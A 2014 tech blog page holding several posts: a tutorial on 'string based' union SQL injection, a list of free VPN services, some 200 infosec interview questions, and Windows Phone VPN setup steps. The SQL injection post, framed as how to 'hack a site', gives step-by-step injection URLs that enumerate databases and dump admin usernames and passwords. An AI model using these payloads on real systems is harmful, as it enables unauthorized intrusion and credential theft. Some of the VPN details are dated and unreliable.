Techking | The Ultimate Tech Blog: Location

09 July 2014

String Based SQL injection

What is String Based SQL injection and how to notice them?
To make this simple to understand, String Based SQL injection happens when the site is vulnerable to SQL injection but doesn't show us the results needed to be displayed after executing our SQLi query.
Common known issues that proves the site being vulnerable to String Based are:

Code:

"order by" doesn't work, example: order by 100--

"group by" doesn't work

"having 1=2" doesn't work

queries related to SQL injection doesn't work (will show a normal page even though site is vuln to SQLi)

Solution to this issue in order to hack a site with String Based SQL injection
The answer to this problem is by using the following format while trying to hack a site with SQLi

Code:

http://site.com/index.php?id=10' order by 1000--+

That will show us the error, hence displaying the results according to our query.
The point here is that we used the quote ' and the + sign in our query

Code:

id=X' order by--+

Alright that you've got the point lets try String Based on some of the other types of SQL injection shall we

String-Union Based SQL injection
1. Obtaining the number of columns (in this example, we'll use 10 columns)

Code:

http://www.site.com/index.php?id=234' order by 11--+

Results show error, so we'll assume as 10 columns, since it'll be an example for our process

2. Obtaining the Databases

Code:

http://www.site.com/index.php?id=-234'
 UNION SELECT 1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from 
information_schema.schemata--+

Results will display the databases on their website
Note: If you don't know anything about UNION Based SQL injection, I suggest you read one of my tutorials to progress further in this step

3.Obtaining the Tables from the current Database

Code:

http://www.site.com/index.php?id=-234'
 UNION SELECT 1,2,3,4,5,group_concat(table_schema,0x0a),7,8,9,10 from 
information_schema.tables where table_schema=database()--+

Results will display the current table names
For this example, we'll be using the table name: "admin"

4.Obtaining Column names from a specific table (which in this example is "admin")

Code:

http://www.site.com/index.php?id=-234'
 UNION SELECT 1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from 
information_schema.columns where table_name=0x61646d696e--+

Results will display the column names from the current table
To convert plain text to hex, use: http://www.swingnote.com/tools/texttohex.php

For this example, we'll use "username" and "password" as our column names

5.Obtaining Data from Column names

Code:

http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+

Results will display the data given by the columns you have chosen

This can be also done with Error Based SQL injection, Blind Based and other types of SQL injection

Top 10 Free Vpn Services!!!

Top 10 Free VPN Servies
First of all, lets talk about what a VPN is.
VPN simply means “Virtual Private Network”. Basically it’s a private network which lets users to connect to other users or remote sites using a public network usually internet. It uses “virtual” connections routed through the Internet from the company’s private network to the remote site or employee instead of physical connections. In short , it is private network constructed within a public network infrastructure, such as the global Internet.
Why You Need VPN

To protect privacy, either on a LAN or a public hotspot.
Anonymous Internet Surfing Full anonymity by hiding your real IP address.
Bypass geographical blocks from certain websites Unlike a proxy, you get secured connection for all programs you are using Quality Network ensures your VPN service will be fast wherever you are in the world Protection against your ISP Bypass ISP Blocking for VOIP Applications like Skype.

Top 10 Free VPN Servies
1. UltraVPN
(https://www.ultravpn.fr/) It is a free VPN client/ server SSL VPN solution based on OpenVPN. It encrypts and anonymizes your network connection making your connection safe and secure. You need to download and install the client and create a (username, password) to use this service.
2. Logmein Hamachi
( https://secure.logmein.com/products/hamachi2/download.aspx )
It’s a great free VPN service from the well known guys who are behind the Logmein Service of remote apps management. It’s free for non-commercial and personal use. Features : No hardware required – A quick, simple and easy-to-use VPN that just works Secure communications – Encrypted tunneling across public and private networks Flexible networking – Combines the ease of an SSL VPN with the connectivity of an IP-sec VPN Web-based management – Deploy to anyone, manage from anywhere, access anytime Free for non-commercial usage – Absolutely free for non- commercial use.
3. Packetix
(http://www.packetix.net/en/)
Its a japanese free VPN solution with technology developed by SoftEther Corporation.You can use PacketiX.NET online test service for free.Here’s what you can do with this service. You can create your private Virtual VPN Hub. You can configure and use the hub for free.You can use all functions the PacketiX VPN software has to offer, such as creating a remote connection to your home network or uniting local networks at different sites. With our system, you won’t need to set up a VPN server with a global IP address yourself. The VPN server administration is done over an easy web interface.
4. Open VPN
( http://openvpn.net/index.php/opensource/downloads.html )
Open VPN drives UltraVPN, OpenVPN is a SSL/TLS based VPN, it provides high security and privacy. The biggest difference between PPTP VPN and OpenVPN is you need install OpenVPN client software to use OpenVPN service, and OpenVPN DO NOT work on mobile devices such as Iphone, Ipad Windows Mobile and Android. But OpenVPN works on Windows, Mac and Linux.
5. Your Freedom
( http://www.your-freedom.net/index.php?id=downloads )
This one is basically not a VPN service but its performs almost the same function with great ease, hence i included this in this list. It provides both a free and paid service. Free service limits to six hours of usage per day (up to 18 hours per week). You need to install a client on your system and a user name & password to use this.
6. Macro VPN
(http://www.macrovpn.com/)
Just like other services MacroVPN offer free VPN service for the user’s, it provides 128bit PPTP encrypted VPN Connection Service, protection on wifi hotspot. Normally assigned US based IP’s.
7. Hotspot Shield
( http://hotspotshield.com/?lg=en)
Hotspot Shield is a free VPN service which protects your entire web surfing session; securing your connection at both your home Internet network & Public Internet networks (both wired and wireless) . Hotspot Shield protects your identity by ensuring that all web transactions (shopping, filling out forms, downloads) are secured through HTTPS.Here also, you need to download and install a client to use it on your computer.
8. Its Hidden
(http://itshidden.com/)
Itshidden is part of Port 80 Limited(Seychelles) company providing both free VPN and paid services of VPN It creates a secure connection encrypting all the data protecting your privacy and securing you. You dont need to install any software. ItsHidden.com works on all Platforms including Windows, Mac, Linux, IPhone etc
9. CyberGhost
(http://cyberghostvpn.com/)
This a free VPN service from Germany which helps you route you through a German IP. The free service is limited to 10GB traffic every month, which is more than enough for surfing on websites, chatting and email.
10. Gpass
( http://gpass1.com/gpass/)
This is another free VPN service product of the World’s Gate, Inc which offers Internet solutions for information freedom in China and other regions. You need to install a software client to use this.

30 June 2014

infosec interview questions

1) What do you see as the most critical and current threats effecting Internet accessible websites?
2) What online resources do you use to keep abreast of web security issues?
3) Give an example of recent security vulnerability or threat?
4) Difference between a threat, vulnerability and risk?
5) What do you see as challenges to successfully deploying/monitoring web intrusion detection?
6) Definition of XSS and its impact on servers and clients?
7) What are the important steps you would recommend to secure a new web application and web server?
8) What is DOM based XSS?
9) What is Blind SQL injection?
10) Where do you get security news from?
11) If you had to both encrypt and compress data during transmission, which would you do first, and why?
12) Difference between HTTP and HTML?
13) Difference between stored and reflected XSS?
14) Common defenses against XSS?
15) Difference between Stateful and Stateless firewall?
16) What kind of network do you have at home?
17) What port does ping work?
18) Explain CSRF?
19) How to defend against CSRF?
20) Difference between XSS and CSRF?
21) As a corporate Information Security professional, what’s more important to focus on: threats or vulnerabilities?
22) What are Linux’s strengths and weaknesses vs. Windows?
23) What’s the difference between Diffie-Hellman and RSA?
24) What kind of attack is a standard Diffie-Hellman exchange vulnerable to?
25) What’s the goal of information security within an organization?
26) Are open-source projects more or less secure than proprietary ones?
27) What’s the difference between encoding, encryption, and hashing?
28) What is salting?
29) Who do you look up to within the field of Information Security? Why?
30) What is NMAP? Show some nmap commands.(avoid firewall/ids, noping etc.,)
31) What is Key Escrow?
32) What is nonce?
33) What does RSA stand for?
34) What is DES?
35) What is triple DES?
36) What is the difference between Symmetric and Asymmetric?
37) How does HTTP handle state?
38) In public-key cryptography you have a public and a private key, and you often perform both encryption and signing functions. Which key is used for which?
39) How exactly does traceroute/tracert work at the protocol level?
40) What is a Buffer Overflow?
41) What is a NOP Sled?
42) Design a secure network
43) How do you securely link two offices together?
44) What is the security threat level today at the Internet Storm Center (ISC)?
45) What is SSL?
46) How do you create SSL certificates, generically speaking?
47) What is DNS Hijacking?
48) What is the latest security breach you’re aware of?
49) Have you hacked any system?
50) Can a Virtual Operating System be compromised?
51) What is UPX?
52) What is meterpreter?
53) What is LDAP?
54) Why is LDAP called Light weight?
55) What are the standard port numbers for SMTP, POP3, IMAP4, RPC, LDAP and Global Catalog?
56) What are rainbow tables?
57) What is dsniff?
58) Other than Wireshark, what sniffers have you used?
59) What was the last course you attend? Where? When? Why?
60) What was the last technical book you read?
61) Describe the last security implementation you were involved with.
62) What is a honeypot?
63) Are there limitations of Intrusion Detection Signatures?
64) Describe TCP 3-way Handshake?
65) Difference between pen testing and vulnerability assessment?
66) Difference between vulnerability and mitigation?
67) Give me an example of a vulnerability at each layer of the OSI reference model.
68) Give me a type of mitigation for each of the vulnerabilities you have just provided.
69) OSI(Open System Interconnection) model
70) What is MITM?
71) What is a Syn Flood attack, and how to prevent it?
72) What’s the difference between a router, a bridge, a hub and a switch?
73) Your network has been infected by malware. Please walk me through the process of cleaning up the environment.
74) What’s the difference between a Proxy and a Firewall?
75) Why should I use server certificates on my e-commerce website?

76) What’s port scanning and how does it work?
77) Process of pen testing a system
78) What is NAT and how does it work?
79) What is false positive and false negative?
80) Please detail 802.1x security vs. 802.11 security
81) How would you harden a Windows Server? What about a Linux Server?
82) What are the latest threats you foresee for the near future?
83) What is ISO 27001 and why should a company adopt it?
84) What is the Microsoft Baseline Security Analyzer?
85) Define Security
86) MAC OS vs. WINDOWS
87) Ping uses TCP or UDP?
88) Explain Authentication and authorization?
89) What is a Brute force attack?
90) What is meant by client-side scripting?
91) What is a cookie?
92) Explain DOS, DDOS
93) What is directory traversal attack?
94) What is meant by reconnaissance?
95) What is forced browsing?
96) What is meant by session ID?
97) Define Web application?
98) What is meant by WAF?
99) Explain different types of hackers?
100) what are the different types of penetration testing?
101) Explain CIA triad
102) what are Google hacks/dorks?
103) List out OWASP top 10
104) Define Hacking? What is ethical hacking?
105) what are the various penetration testing methodologies?
106) what is social engineering?
107) In the context of Metasploit, explain what is meant by exploit, payload, auxiliary, encoders, NOP, post
108) what are root kits?
109) Explain Steganography
110) Difference between autopwn and armitage
111) what is meant by backdooring?
112) what is INCIDENT RESPONSE?
113) what is chain of custody?
114) what are the different port’s used commonly and list out their port no’s?
115) what is imaging?
116) what is padding?
117) what is pivoting?
118) what is SSH, FTP, TSL?
119) what is HTTP response splitting?
120) what is RFI, LFI?
121) what do you know about encryption?
122) Can CSRF be done for POST and GET methods?
123) what is the encryption of ssl certificate in a website?
124) Difference between public and private key?
125) what is chain of custody?
126) what is meant by incident response?
127) what is hacktivism?
128) what is a firewall? types of firewall?
129) what is ssl, how do you create ssl certificates?
130) what is a spoofed packet
131) what is IDS or IDP? Give example?
132) what would you do if your system is compromised?
133) what is web-caching?
134) what is use of proxy servers?
135) what would you do if your network device is compromised?
136) what is GPG/PGP?
137) what is log host?
138) how do you manage a firewall?
139) if you were not using Apache as the reverse proxy, what Microsoft application/tool could you use to mitigate this attack?
140) Why we use firewall for security when we have facilities like access-list on routers ?
141) what is the difference between an SSL connection and an SSL session?
142) List and briefly define four techniques used to avoid guessable passwords.
143) what is a salt in the context of UNIX password management?
144) what is the difference between rule-based anomaly detection and rule-based penetration identification?
145) what is the difference between statistical anomaly detection and rule-based intrusion detection?
146) Describe SOAP and WSDL
147) what protocols comprise SSL?
148) what are hidden fields in HTTP?
149) what steps are involved in the SSL Record Protocol transmission?
150) what is file enumeration?
151) what tools can you use to validate the strength of SID (session ID)?
152) what is phishing attack?
153) what is cookie gathering?
154) what is a dual signature and what is its purpose?
155) how can you ensure that all input fields are properly validated to prevent code injection attacks?
156) why do we need port scanning?
157) what are format string vulnerabilities?
158) Example of broken authentication and command injection
159) what is sql injection?
160) what are fuzzers?
161) what is runtime inspection?
162) what is ISO 17799
163) what is integer overflow?
164) what type of security testing have you performed?
165) what is ARP spoofing?
166) During an audit, an interviewee is not disclosing the information being requested. How would you overcome this situation?
167) Why should I use server certificates on my e-commerce website?
168) Can a server certificate prevent SQL injection attacks against your system? Please explain.
169) What are the most common application security flaws?
170) What do you understand by layered security approach?
171) Difference between virus, Trojan, spyware, malware and a worm
172) Can Linux be compromised? How secure is Linux? How would you compromise a LINUX system?
173) What do you do if you are a victim of a DoS attack?
174) What is a log host?
175) what are the security functions of SSL?
176) what is a 0 by 90 bytes error.
177) what is the problem of having a predictable sequence of bits in TCP/IP?
178) what is heap memory?
179) what is a system call?
180) what is 2 factor authentication?
181) what is IIS lockdown tool?
182) what is disaster recovery?
183) what is a null session?
184) what is incident management?
185) what is SAM (Security Account Manager)?
186) what is a SID (Security ID)?
187) what is the difference between TCP and IP?
188) what is the difference between TCP and UDP?
189) Explain IP Address?
190) what is Public IP and Private IP?
191) Define subnet mask, default gateway, loopback address and IPID?
192) what is Hypertext Transfer Protocol (HTTP)? What are request methods?
193) Difference between IPv4 and IPv6
194) what is the difference between stateful and stateless protocol? Explain with example?
195) how would you prevent man-in-the-middle attacks?
196) Example, recommendation and affect of DOM based XSS?

197) what is XSP(Cross site printing)?

198) Describe OSPF routing?

199) what are the consequences of HTTP trace request?

200) what is session hijacking?

201) how would you convince a client to use your security product?

202) how do you secure a Wi-Fi network?

203) what is a protocol, socket and port?

204) what is your area of expertise and why?

205) what is the difference between routing protocols and routed protocols?

206) Difference between session and cookie?

How To Use VPN in Windows Phone 8.1

Use a VPN connection

At a coffee shop and need to get to a site on your company's intranet? Or using an app from your company at home? With virtual private networking (VPN), you can do these things from your Windows Phone—just as if you were in the office. VPN gives you a secure connection to your company's network, so you can send and receive private information using a Wi-Fi or cellular data connection.

To get a VPN profile on your phone

The first step is to get a VPN profile onto your phone. There are two ways to get one:

Set up a workplace account to automatically get a VPN profile from your company.
Create a VPN profile on your own. (You can learn how later in this topic.) When you do this, you'll need to contact your company's support person to get the VPN connection settings for your organization.

Note

VPN is only available on Windows Phone 8.1. Check to see which software version you have and find out if an update is available.

To connect to a VPN

Once you have a VPN profile on your phone, you're ready to connect.

In the App list, tap Settings > VPN.
Tap and hold the VPN profile name, and then tap Edit.
In the User name and Password boxes, type your user name and password.
To connect to the VPN, do one of the following, depending on what type of profile you're using:
- If the VPN profile has Automatic listed under it, your phone will automatically connect to the VPN when you try to access information on your company's network.
- If the VPN profile has Manual listed under it, tap the profile to connect to the VPN, and then use the app that accesses data on your company's network or visit a company intranet site.

Note

The icons at the top of your screen will show you when you're connected to the VPN. This icon VPN over Wi-Fi icon

appears when you're connected over Wi-Fi, and this one VPN over cellular data icon

shows when you're connected over cellular data.

To create a VPN profile

If you don't have a VPN profile on your phone, you'll need to create one on your own. Before you start, contact your company's support person to get the VPN connection settings for your organization.

In the App list, tap Settings > VPN.
Set Status to On , and then tap Add .
In the Server name or IP address box, type the server name or IP address of your VPN server.
Tap Type and choose the type of VPN connection you want to create.

If an SSL VPN app is required and you don't have one installed yet, tap the link to download one from the Store.
Tap Connect using, and choose the method you want to use to connect.
In the User name and Password boxes, type your user name and password.
To automatically connect to the VPN when a company app or site requires it, set Connect automatically to On .
For Send all traffic, do one of the following:
- To have all data you send and receive go over the VPN, set Send all traffic to On .
- To only have data that requires access to your company's network or intranet go over the VPN connection, set Send all traffic to Off , tap Domains and IP ranges, and then enter the domain names and IP ranges that are protected. Only data that's sent and received from those domains or IP addresses will go over the VPN connection. Other data that's sent or received won't go over the VPN.
In the Profile name box, type a name for your profile.
Tap Advanced, and then enter any additional settings you need to for your organization's VPN.

You might need to contact your company's support person to get additional information, such as the Proxy settings and DNS suffix to use for your company's network.
Press the Back button on your phone to go back to the Add profile screen, and then tap Save.